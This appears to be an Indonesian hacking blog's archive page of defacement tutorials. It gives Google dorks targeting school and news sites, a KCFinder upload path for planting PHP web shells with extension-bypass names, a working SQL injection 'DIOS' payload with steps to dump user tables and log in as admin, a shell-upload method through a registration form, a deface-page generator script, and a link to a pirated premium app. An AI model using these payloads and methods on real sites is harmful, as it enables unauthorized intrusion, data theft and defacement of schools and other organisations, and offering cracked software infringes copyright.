Ads

Archive for June 2019

Halo sobat miskin :v kembali lagi dengan saya MarsHall btw sorry ya baru update lagi dikarenakan sibuk :'v langsung aja guys...


Bahan-bahan

Dork (Sudah saya siapin dibawah )
Exploit (ada dibawah gan )
Shell ber ext .php5 .php.xxxjpg .php.fla
Siapkan kesabaran Anda

Dork

inurl:data-link- site:sch.id
inurl:/?p=detberita&id=
powered by Formulasi Free Opensource CMS

Exploit

Adminpanel/ckeditor/kcfinder/browse.php
Adminpanel/ckeditor/kcfinder/upload.php

Csrf : Klik Disini


1. Dorking target di google search engine

2. Cari situs yang masih vuln, Biar bisa diupload shell

3. Masukkan exploit

contoh : http://site.sch.id/[path]/adminpanel/ckeditor/kcfinder/browse.php

4. Upload shell kalian dengan ext yang diatas tadi kalo masih gak bisa ya kalian perbanyak ngaca lagi deh hehehe

5. Kalo sukses terupload, tinggal akses shellnya. Masukkan exploit ini
http://site.sch.id/[path]images/files/namashell.php

6. Kalo udah kebuka aksesnya, terserah kalian mau diapain.

Deface Poc Kcfinder Di CMS Formulasi

Sunday, June 30, 2019
0 Comments

Deface Metode SQL Injection CMS Kelulusan
Date : 16 Juni 2019
Author : Ulin + Endang
Garuda Security hacker
CMS github :https://github.com/slametbsan/kelulusan/
Vuln : SQL
######################
Dork :
intext:"Masukkan nomor ujianmu pada form yang disediakan"
Masukin Dios di form yang ada
' union select (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x3C,0x62,0x72,0x3E,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a),2,3,4,5,6,7,8-- -
(@⁨Ulin⁩ yang bikin diosnya, karena w noob SQL Injection manual)
Maka akan muncul database nya
Selanjutnya silakan dump manual sendiri gan.
Dump : un_user
Login : site/path/admin
Kalo ada database utama webnya yah dump ajah sekalian
And enjoys

Source? https://www.postekno.net

Deface Metode SQL Injection CMS Kelulusan

Monday, June 17, 2019
0 Comments

Halo semua, kali ini saya akan share apk PicsArt versi mod, ini sangat cocok untuk sobat misquen kayak saya wkwk :v

Semua fitur disini kebuka semua alias free tanpa harus bayar untuk menjadi premium.


Semoga bermanfaat :)

Download PicsArt Versi Terbaru (MOD)

Halo sob kali ini saya bakalan share tools script deface V2. Cara menggunakannya masih sama dengan yang sebelumnya cuma hasilnya beda :v hasilnya kayak gambar diatas :)

Buka termux ketikan ini

$apt update

$apt upgrade

$pkg install git

$pkg install python2

$git clone https://github.com/MarsHallGans/Created-Script-DefaceV2

$ls

$cd Created-Script-DefaceV2

$ls

$chmod +x created.py

$python2 created.py

Lalu tinggal anda isi aja judul nya sesuka hati kalian

$ls

$mv -f script.html /sdcard

Semoga bermanfaat:)

Tools Create Script Deface V2 (Termux)

Tuesday, June 11, 2019
0 Comments

Helo guys, sorry saya baru update lagi :v dikarenakan lagi galau:* wkwk
Kali ini saya akan memberikan tutorial deface poc register member (Regmem). Langsung aja guys...

Dork : intext:"PENDAFTARAN UNTUK KONTRIBUTOR BERITA" (Kembangin lagi gan)
Shell backdoor : ext shell.php.pjpeg


  • Pertama kalian dorking dulu ke browser kesayangan anda :v
  • Kalo udah tinggal klik nanti akan muncul kolom untuk registrasi, seperti ini :
  • Kalian isi semuanya jangan sampe ada yang kosong (ngasal juga gpp)
  • Jika sudah tinggal kalian klik Daftar Sekarang!
  • Jika sudah anda nanti akan ke redict ke halaman dashboard, seperti ini :
  • Nah tinggal kalian up shell di foto profil
  • Kalo gak bisa? Add berita aja gan kalo gak jso wkwkw
Cukup sekian tutorial dari saya semoga bermanfaat:) jangan lupa share ya.

Tutorial Deface Poc Register Member Web Cms Swarakalibata

Saturday, June 1, 2019
0 Comments

- Copyright © Learning Tech - Blogger Templates - Powered by Blogger - Designed by Johanes Djogan -